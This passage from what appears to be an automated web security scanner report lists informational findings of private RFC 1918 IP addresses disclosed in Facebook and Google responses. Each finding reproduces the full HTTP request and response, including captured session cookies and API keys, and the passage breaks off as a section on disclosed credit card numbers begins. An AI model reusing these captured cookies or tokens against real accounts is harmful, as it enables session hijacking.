04&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2b4911b08%26origin%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Ff3dc5c8b3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32b0f9a04&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=1#cb=f156192d64&origin=http%3A%2F%2Fwww.foxbusiness.com%2Ff3dc5c8b3&relation=parent&transport=postmessage&frame=f32b0f9a04
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.136.131
X-Cnection: close
Date: Thu, 12 May 2011 11:38:01 GMT
Content-Length: 0


23.7. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_925756&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_925756&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.210.45
X-Cnection: close
Date: Thu, 12 May 2011 11:03:26 GMT
Content-Length: 0


23.8. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=100001111898866&app_id=100001111898866&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df10322942c%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df2e5e42118%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8a04dca%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3a8785378%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8a04dca&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3e71225fc%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8a04dca&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfd5d15fc%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8a04dca&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.145.124
X-Cnection: close
Date: Thu, 12 May 2011 11:37:23 GMT
Content-Length: 17

Application Error

23.9. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_925756&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_925756&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.164.62
X-Cnection: close
Date: Thu, 12 May 2011 10:59:39 GMT
Content-Length: 0


23.10. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_925756&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_925756&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.152.44
X-Cnection: close
Date: Thu, 12 May 2011 10:59:54 GMT
Content-Length: 0


23.11. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_925756&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_925756&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.170.45
X-Cnection: close
Date: Thu, 12 May 2011 11:03:50 GMT
Content-Length: 0


23.12. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_925756&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_925756&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.167.47
X-Cnection: close
Date: Thu, 12 May 2011 11:00:55 GMT
Content-Length: 0


23.13. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110512_0700%26ssh%3DS423239929%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.145.48
X-Cnection: close
Date: Thu, 12 May 2011 10:59:38 GMT
Content-Length: 8669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

23.14. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&api_key=116027085089150&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df196b91cf4%26origin%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Ff3dc5c8b3%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.140.121
X-Cnection: close
Date: Thu, 12 May 2011 11:38:41 GMT
Content-Length: 9452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

23.15. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&api_key=100001111898866&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df21a2dada%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fbloom.bg%2FjZW47c&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.148.115
X-Cnection: close
Date: Thu, 12 May 2011 11:37:36 GMT
Content-Length: 7006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

23.16. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&api_key=100001111898866&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df247c0f3%26origin%3Dhttp%253A%252F%252Fwww.bloomberg.com%252Ff16b1945d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fbloom.bg%2FjZW47c&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.125.108
X-Cnection: close
Date: Thu, 12 May 2011 11:37:43 GMT
Content-Length: 7004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

23.17. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&api_key=116027085089150&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3f506b638%26origin%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Ff3dc5c8b3%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.139.129
X-Cnection: close
Date: Thu, 12 May 2011 11:38:41 GMT
Content-Length: 9452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

23.18. http://www.google.com/sdch/vD843DpA.dct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/vD843DpA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/vD843DpA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj
If-Modified-Since: Thu, 12 May 2011 00:18:06 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Thu, 12 May 2011 09:05:47 GMT
Date: Thu, 12 May 2011 11:16:10 GMT
Expires: Thu, 12 May 2011 11:16:10 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 116591

Domain: .google.com
Path: /search

<!doctype html> <head> <title>re - Google Search</title> <script>window.google={kEI:"28555,29481,2966,29876,29881,29891,30035,30039,30058",kCSI:{e:"25907,4,29
...[SNIP]...
<a href="/search?hl=en&amp;q=related: http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCN clk(this.href,'','','','1','','0CCk ')">
...[SNIP]...
<b>www.ahttp://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCN clk(this.href,'','','',' UBEBYwBg')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:www.edmunds.com/used-cars/+used+carNKvLeHS7sb0J:www.carsdirect.com/used_cars/search+used+car&hl=en&ct=clnk&gl=us&source=www.google.com','','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rectv.com/DTVAPP/content/contact_us+directKvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account+direct 4','AFQjCN clk(this.href,'','','','4',''
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: OJ7l3PBi2ywJ:www.usedcars.com/+used+carH75rMPosXksJ:www.cars.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car topics.nytimes.com/top/news/business/ &amp;rct=j&amp;sa=
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:4AUACFJFdYwJ:search.aol.com/+aol3-ZEIkE37Z4J:www.directv.com/+direct1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google
...[SNIP]...
<a href="/search?hl=en&amp;q=related:http://172.31.196.197:8888/search?q=cache: &amp;cd= &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNGclk(this.href,'','','','1','','0C QIDAG')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:_AF_a1pfx4YJ:www.craigslist.com/+o&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','',' clk(this.href,'','','','8',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','',' 9','AFQjCNFclk(this.href,'','','','9','','0C en.wikipedia.org
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNFclk(this.href,'','','','1rwt(this,'','','','1 cl
...[SNIP]...

24. Credit card numbers disclosed
There are 3 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


24.1. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The following credit card number was disclosed in the response:

Request

GET /cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B?cc=0.3572320435196161 HTTP/1.1
